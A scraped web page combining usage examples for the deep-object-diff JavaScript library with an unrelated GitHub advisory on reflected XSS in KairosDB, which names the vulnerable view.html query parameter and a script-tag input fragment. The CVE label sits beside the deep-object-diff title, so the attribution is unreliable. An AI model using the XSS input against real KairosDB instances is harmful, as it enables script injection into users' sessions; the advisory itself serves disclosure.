import { diff, addedDiff, deletedDiff, updatedDiff, detailedDiff } from 'deep-object-diff';

**Usage:****diff:**

const lhs \= {
  foo: {
    bar: {
      a: \['a', 'b'\],
      b: 2,
      c: \['x', 'y'\],
      e: 100 // deleted
    }
  },
  buzz: 'world'
};

const rhs \= {
  foo: {
    bar: {
      a: \['a'\], // index 1 ('b')  deleted
      b: 2, // unchanged
      c: \['x', 'y', 'z'\], // 'z' added
      d: 'Hello, world!' // added
    }
  },
  buzz: 'fizz' // updated
};

console.log(diff(lhs, rhs)); // =>
/\*
{
  foo: {
    bar: {
      a: {
        '1': undefined
      },
      c: {
        '2': 'z'
      },
      d: 'Hello, world!',
      e: undefined
    }
  },
  buzz: 'fizz'
}
\*/

**addedDiff:**

const lhs \= {
  foo: {
    bar: {
      a: \['a', 'b'\],
      b: 2,
      c: \['x', 'y'\],
      e: 100 // deleted
    }
  },
  buzz: 'world'
};

const rhs \= {
  foo: {
    bar: {
      a: \['a'\], // index 1 ('b')  deleted
      b: 2, // unchanged
      c: \['x', 'y', 'z'\], // 'z' added
      d: 'Hello, world!' // added
    }
  },
  buzz: 'fizz' // updated
};

console.log(addedDiff(lhs, rhs));

/\*
{
  foo: {
    bar: {
      c: {
        '2': 'z'
      },
      d: 'Hello, world!'
    }
  }
}
\*/

**deletedDiff:**

const lhs \= {
  foo: {
    bar: {
      a: \['a', 'b'\],
      b: 2,
      c: \['x', 'y'\],
      e: 100 // deleted
    }
  },
  buzz: 'world'
};

const rhs \= {
  foo: {
    bar: {
      a: \['a'\], // index 1 ('b')  deleted
      b: 2, // unchanged
      c: \['x', 'y', 'z'\], // 'z' added
      d: 'Hello, world!' // added
    }
  },
  buzz: 'fizz' // updated
};

console.log(deletedDiff(lhs, rhs));

/\*
{
  foo: {
    bar: {
      a: {
        '1': undefined
      },
      e: undefined
    }
  }
}
\*/

**updatedDiff:**

const lhs \= {
  foo: {
    bar: {
      a: \['a', 'b'\],
      b: 2,
      c: \['x', 'y'\],
      e: 100 // deleted
    }
  },
  buzz: 'world'
};

const rhs \= {
  foo: {
    bar: {
      a: \['a'\], // index 1 ('b')  deleted
      b: 2, // unchanged
      c: \['x', 'y', 'z'\], // 'z' added
      d: 'Hello, world!' // added
    }
  },
  buzz: 'fizz' // updated
};

console.log(updatedDiff(lhs, rhs));

/\*
{
  buzz: 'fizz'
}
\*/

**detailedDiff:**

const lhs \= {
  foo: {
    bar: {
      a: \['a', 'b'\],
      b: 2,
      c: \['x', 'y'\],
      e: 100 // deleted
    }
  },
  buzz: 'world'
};

const rhs \= {
  foo: {
    bar: {
      a: \['a'\], // index 1 ('b')  deleted
      b: 2, // unchanged
      c: \['x', 'y', 'z'\], // 'z' added
      d: 'Hello, world!' // added
    }
  },
  buzz: 'fizz' // updated
};

console.log(detailedDiff(lhs, rhs));

/\*
{
  added: {
    foo: {
      bar: {
        c: {
          '2': 'z'
        },
        d: 'Hello, world!'
      }
    }
  },
  deleted: {
    foo: {
      bar: {
        a: {
          '1': undefined
        },
        e: undefined
      }
    }
  },
  updated: {
    buzz: 'fizz'
  }
}
\*/

**License**

MIT

CVE-2022-41713: GitHub - mattphillips/deep-object-diff: Deep diffs two objects, including nested structures of arrays and objects, and returns the difference. ❄️

KairosDB through 1.2.2 has XSS in view.html because of showErrorMessage in js/graph.js, as demonstrated by view.html?q= with a '"sampling":{"value":"<script>' substring.

**Reflected Cross site scripting (XSS) in kairosdb**

Moderate severity GitHub Reviewed Published Nov 3, 2022 • Updated Nov 3, 2022

Tag

#js